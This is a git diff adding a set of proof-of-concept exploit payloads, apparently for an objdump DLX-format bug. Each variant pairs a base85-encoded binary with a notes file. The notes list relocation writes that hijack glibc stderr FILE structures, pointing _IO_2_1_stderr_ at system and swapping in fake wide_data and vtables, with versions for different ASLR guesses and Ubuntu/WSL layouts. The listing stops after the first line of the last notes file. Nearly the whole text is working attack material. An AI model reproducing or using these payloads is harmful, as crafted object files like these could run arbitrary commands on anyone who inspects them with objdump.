0000000000000000000000000000000000000000..9eb3932557300f35031e7edbac0dd2f2c7907019 GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&dLYMAcjOWf*#zz-jdf~lu&%I|Z_r1CA$I{znD`g=zYwd)7B4GdZ za})kPhBVq^?Y(kRvw)oeQgeWl@x1eOpiOuaXcs&N(h}bQI>;Y<05XEBK&N1tOYkGm zMYO*GS;6nXL;3Cy=(fqPfSkmC13eP|3G_1V%mR7FojKqU;}^W0K8ZJheu*Cg0}`JG z9;bq<8w>zLAwCK5-@syt|H2M{;824Hu57ze)Rg8v>W$dF!bYwzEoTMlRV#)q33_NbN*K=e)+imqM?6n=--gb zy+-%BLSHQ6?*kfh&XI3HUcZ1=&@OZddII_-^d$5Y^fdGgQ<7$0QJ|<$lqhNxMT#m# znWE06&XqdUxzxFQf5k@ipn>96wX*+tedo)k8jAJm?j5eb?lm?mDC$N%!0pfrd;A}e z8Iu*gb9wnPQ;|h}nt|jza;|X{i4wUyea=4?xWxEg{3Uh#dnR^p$y^8z&0;O FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..b534929662d3c4c5c6dda4d3ebe94454face8cea GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&t(xrPBUU=`^bMKkUeQ)mjvGjJ?N?C}_T05bi2-tu9 z+=Rc6A&vG}d#{|-EMRAV)EwYsJnwuRXcOK9+69k+w8S@n4)O;dfQ;ZO&?#8v68s2s z5$$h4R`5IUP`*0^x^40+ASdzPK##l%$zg6eubbC5jqFk)ldb zrl@nNbEOV-E_E*7U$Id=XrQ=Nt?YkZ-}&;XhGMt`a69zE9{&eq z#$-kBTwcD+RAiB#W*|9_oNF9KqC_rFpYx9eE-}6re@Pwxo{1e?G8e)_vslZzBx&Q~ isQW$0Y!*UJ5VPNLEBkJ+MLm@y*^1kz^ygbV==~P?ynWFC literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes new file mode 100644 index 0000000..29646cd --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..714a463865c3134cc42422f05897ae91321afddb GIT binary patch literal 1280 zcmd5*O-md>5Ph>Vx*ula$C^#lfPn}JEUfnI8Wjx*i1Cnsf(IolXe65`_=UZKVj%tm z?|Stl{(yM$n4b_ZSHWZM9>!PmwPTY*jw$GV^{U zSM~RoNTW5@{#QRIwbxZ=#=RJfhPTaEE@9r}1mxJdw{C`n;jXE z=zEO(QzPGRtwaqVEDDTwQ?{U4q(fG82vTp1IxEgw4kN*NP zW3r-mE-znZDzeB=GmxA|&NYrAQ6g8M&-uq&E-}6re@Pwxo{1SQnG4~eS*&GUlC*Gf i)cqc0HcKHVh}pB;YQ7t6QBM^~Hskgg{nt$%^nM5VzJ1XE literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes new file mode 100644 index 0000000..2df83df --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..06666223aa853f25e2c88c654b1c1be5a9cae54f GIT binary patch literal 1280 zcmd5*+e#Zz6kU^v#>Bg6)2f9&C|D3i&m`WEVyUzWEm-hD&<8OzUN9QTiJ(vZLVv<1 z?LYYF?F0M*71}@O!?^ZbGUItDee8iVYp=D}?3~%z=j7AZ&sNGpb6KmWj1z+W=;uoQ z^Bpp1ZF>K!AhiqFSs+yf(pk^DssSy+Z-7?8TOcF)0nkR?{s3eJ`F%OTU)+Mffexa5 z26PIZ16}go51`v-?RKDtdb$JX75xtA6MYxRi(Um@P`~a0UW$GL6hyxTUWvX4yiNtJ z>km6P5aQrpJIZ2-|Ai;xNAU#oPT@>GnYi!QpfKzv5i~iLU_0=*0L^0TDUptzF%f@G~@(X Z_BTG({4jV#zgv`Ktjm4I`Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..61582b1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..795cdeecc9b3852ed9fff02a778fa72df9171e6f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Tez(dZ{XtgeD^20nMLWc12gA4=R5by%;cM|uin14VitPC`uL4;M6hqY z+@iNWM+(WF_rD5ab-+#ou?7%NyY5vJNC^p`{TB@Xyx}i3*RP}JD;xe5!@pJ)cfbC+;eTWJH_7E*!~3i< zmJ#yzKJD=j16(gaD`*G01ic8o1icJhhOR)rU`o==D;g9XiWWtWqDj%EXjAk#^f^+8 zK8HSs@2}XZowZQht?iudeL6V$+(hxD))?UW%VBGK2SwdF@o_(hf<68VNRP=3-?_Ye z>8Wspaf(8;A1ma1BfSyka#Yy=co}3ai87^*chAHjPU#Eb!LV4%`bm=DWUG6A>CHmG b2{P<=T(-Q>U&7xlNwTlYd&X*?`+NTbW9omR literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..b9c2213 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..47f529fa79c81d633402a83fc007e97b83963d51 GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Te)#e8@RYV-~CB$W>LEAz|8s1`Of_^Gx_H0tGBPMn1$Z3K7L~y5$szp zx9F|UkwUWP{jY*p9kA0ttO3N+u6xx462jX+Qm_N0L_Y?G$VYB~v>?wnEO^H$_#4O& z?F(R3@H_B8zB>oTY}OtD#;M0Mz=Y^sAS-$u$cf$n9#a1`4m=XQ4NQvO0j5OX0H$O9 z)#Za5oC$FDuQ$qKk^hA|K+?j!!3;h!}8 zc_aVW$UiaiPmTOsbAd{K{{_Q8Z}>~i_3P;Q%7%Z%@UK`*O>(){@II@I zWrX~_Pka2s0M`r93fh4#K`%ltK`%p>p)1fYn36Q}iUvi8qD9f8Xi{`3+7x{beU8+j z&!NxZ`zy9;XDt+WYdfcVpAL>bH&HyPH3qo;a@gA5K~c9(eB2MBV2}R-(ql5icP=kq zdMX@YoT3oz#|k;$NN92NFIUIv*!m+*H>lI-j9p0V2J{@(upW;B1J literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..ada2a44 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d912cc46a01fdb57185e17b00c033d60c17bfbb2 GIT binary patch literal 1280 zcmd5*%}QHA7(F*P8e`O^rdqWH7YY@G)Vc8&DGE{*DnxK0=t2ypRg5NNBG^@5!I$XD z_8naM_W*eTQP4MVaeKb|libWgx^!UXeCK@Uewmqk^Xu!{vK6z?7}nNr#u34O@N$#h zI)((=8{StH#0~*F3B*c3Jn6buWuQ&?4bU!l3nWCZ03GD1dmt&u^K}Y7atb~HT}1mF z=ob6~^vHK-z#E&jQ$U(}ybE|MdL8H${Se5AUIN}xzfJ>vqTc}hqTd4VMPCI5V*b?) z1~)hq;D;A)l*Jk{L=K94hw@&xLme`b&m?#qfV4mwOHGGtXE? z$Txi2;F~R6Pe3bZ2Ra8m2|Wcp4Lt)r3q8k_q?uPVC^{4^iXKIiqD#@H=yT|Eqz-)! zeGcDWwpKi?A-h*Boc!21IR0KnwpuK;aQ*YBwp&0}*Q!452T`!c{{iVSnc+K^moGgP zjxbJ8i1y9&myT Zd!5U+7y3*1yE#cVb$QSD(&YZ${{dz;f1>~Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..2eb01e5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..98a9e31d780a1dbd2586b3370de7ed3e84df84ab GIT binary patch literal 1280 zcmd5*%St0b6g{0zjL|qg;w$5TixCurXmxZ{L=;6wa6n-e12YRzj1P=PtO&aD7yOA? zssG^8*9Z6oGlKqsi}u`prLBd`atf-?J?EajslK^&I{$6KN?3@N_47C5m|#D8xe@O< zfHdkN?|&5}b^$vBB+5WC*rAn%<4%{FT{0xi^&S)f()2cS*#T_7iV8EB_|+X8fmeg|}leh+ksz6f+D{MO}z z4t@-<=iQF7SnPk{$@o!x!Gi0$#AKV#lZ@j$jfcL=SiZsVHyM7O8!s_`&hU2{{=AX@ zWaN8|{AVNIe=sD+jm|%4_=gOCu`>H7?jJM!lZJnK*()E_pELYl4gV6k^fm0~GGkdG z|L)U>|9HdoFtmbppo`EW(4){_pvR!cp(mJjb-X?k>$znvga^xFE$fOT#m!Oo{4$$^0Vl|^ YSNQnlh5jS_-J&FGy4+_>)wqB5SCqMbq5uE@ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..75abf9d --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..08b387c203f0286d10673da49263b60bac640f8a GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZAwC<^rtd^oOsZXV}B`sl#S+H37~c4j7fel9G3vJw`eVXggU924wYFE{0_ zV@M+vd0$kJ*aPe=kf;I4tm|IZfi~eSASHMOq(yH48S>l>kQLmF0ZvnlcUjcohF9Q7u|LO*U z8ypO9=-C@(vDp8@o$*loz=G?##ALzeNyc%W#`Wk~EZ=VU^M;@M#(m6RH2l4Wf56DU zG4jJke#FSXZA{2^qy3K?{t3fhu2=rX&o^WEKN$XxD_;4ie#P*AHvCKEa1ogfPK_&*>$CNq5J^75sp z!V$)43h{oNCFdK7Mwly7VgF-3$XpO*N*(W>i5X7m3*o`ASj##mY2#$8dw%K7@qiO# Z*k8DO^Fn_Kf43~jM_t}C<{r7f_XpdLfS~{Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..bd5c091 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 